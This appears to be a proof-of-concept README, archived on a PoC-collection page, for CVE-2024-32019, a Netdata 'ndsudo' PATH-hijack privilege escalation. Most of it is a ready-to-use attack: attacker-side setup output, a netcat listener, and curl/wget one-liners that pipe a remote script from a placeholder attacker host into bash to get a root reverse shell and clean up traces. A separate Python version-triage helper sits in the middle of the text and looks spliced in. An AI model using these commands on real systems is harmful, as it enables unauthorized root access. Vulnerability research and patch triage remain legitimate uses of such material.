Related vulnerability
Description
Privilege Escalation via "ndsudo" (Netdata Local Exploit)
Introduction
# CVE-2024-32019-PoC
Bash script for Privilege Escalation via "ndsudo" (Netdata Local Exploit)
## Netdata Affected Versions
* \>= v1.45.0, < v1.45.3
* \>= v1.44.0-60, < v1.45.0-169
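The two ranges above are easy to misread when a build carries a commit-count suffix, so here is an added triage helper (not part of the PoC repository) that classifies a Netdata version string against exactly those ranges. It assumes the plain `x.y.z` range applies to release tags and the `-N` range to builds with a commit-count suffix (Netdata nightlies are versioned that way); the sample versions are constructed.

```python
import re
from typing import NamedTuple, Optional

# Affected ranges as listed above: inclusive lower bound, exclusive upper bound.
# Assumption: the plain x.y.z range covers release tags, the "-N" range covers
# builds that carry a commit-count suffix (e.g. v1.44.0-60-nightly).
RELEASE_RANGE = ((1, 45, 0), (1, 45, 3))
NIGHTLY_RANGE = ((1, 44, 0, 60), (1, 45, 0, 169))

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-(\d+))?(?:-([A-Za-z]+))?$")


class NetdataVersion(NamedTuple):
    major: int
    minor: int
    patch: int
    build: Optional[int]  # commit-count suffix; None for a release tag


def parse_version(text: str) -> NetdataVersion:
    """Parse 'v1.45.2' or 'v1.44.0-60-nightly'; raise on anything else."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised netdata version: {text!r}")
    major, minor, patch, build, _label = m.groups()
    return NetdataVersion(int(major), int(minor), int(patch),
                          int(build) if build is not None else None)


def is_affected(text: str) -> bool:
    """True if the version falls inside one of the advisory's affected ranges."""
    v = parse_version(text)
    if v.build is None:
        lo, hi = RELEASE_RANGE
        return lo <= (v.major, v.minor, v.patch) < hi
    # A suffixed build is compared against the nightly range only: a tuple
    # compare against the release range would wrongly flag v1.45.0-200.
    lo, hi = NIGHTLY_RANGE
    return lo <= (v.major, v.minor, v.patch, v.build) < hi


def triage(versions):
    """Map each version string to its affected/not-affected verdict."""
    return {ver: is_affected(ver) for ver in versions}


if __name__ == "__main__":
    # Constructed sample of version strings, e.g. gathered from an asset inventory.
    sample = ["v1.45.0", "v1.45.2", "v1.45.3", "v1.44.0-59-nightly",
              "v1.44.0-60-nightly", "v1.45.0-168-nightly", "v1.45.0-169-nightly"]
    for ver, hit in triage(sample).items():
        print(f"{ver:22s} {'AFFECTED' if hit else 'not affected'}")
```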
## Vulnerability Description
The "ndsudo" tool runs a restricted set of external commands, but it locates them using the search paths supplied by the "PATH" environment variable.
By changing the "PATH" environment variable to a directory we have write access to, we can control where ndsudo looks for those commands and place one there that contains malicious code.
## Proof Of Concept
This exploit assumes that the target machine and the attacker machine are on the same network.
### Prerequisites
#### Attacker Machine
* Listener on port 4444
* Web server hosting the malicious nvme binary
#### Target Machine
* Local shell access
* Permission to execute ndsudo
* wget/curl/any HTTP client for payload download
### Usage
#### On Attacker Machine
We can automatically generate and deploy the files needed for the attack by running the "setup_exploit_server.sh" script:
```bash
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
```
This script will create all the files needed for the attack, configured with your IP address.
After deploying our web server, we start a listener in another shell:
```bash
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
```
#### On Target Machine
Depending on our HTTP client, we can download and execute our exploit.
```bash
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
```
If everything was done correctly, we should now have a root shell.

### Exploit Flow
1. Downloads the malicious binary to /tmp/exploit/
2. Modifies PATH to prioritize the controlled directory
3. Executes `ndsudo nvme-list`, which runs the malicious binary
4. Establishes a reverse shell to the attacker machine
5. Cleans up traces
## Reference
* https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
* https://nvd.nist.gov/vuln/detail/CVE-2024-32019
## Legal Disclaimer
This proof-of-concept is for educational and authorized testing purposes only.
Unauthorized use against systems you do not own or have explicit permission to test is illegal.
The authors are not responsible for any misuse of this information.
File snapshot
[4.0K] /data/pocs/e713b2bf2d78228feaf23f31270b7f314538275b
├── [ 302] example_nvme.c
├── [1.0K] ndsudo_pe.sh
├── [2.9K] README.md
└── [2.9K] setup_exploit_server.sh
1 directory, 4 files
Notes
1. It is recommended to access the PoC via its original source first.
2. If the source is unavailable or inaccessible, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.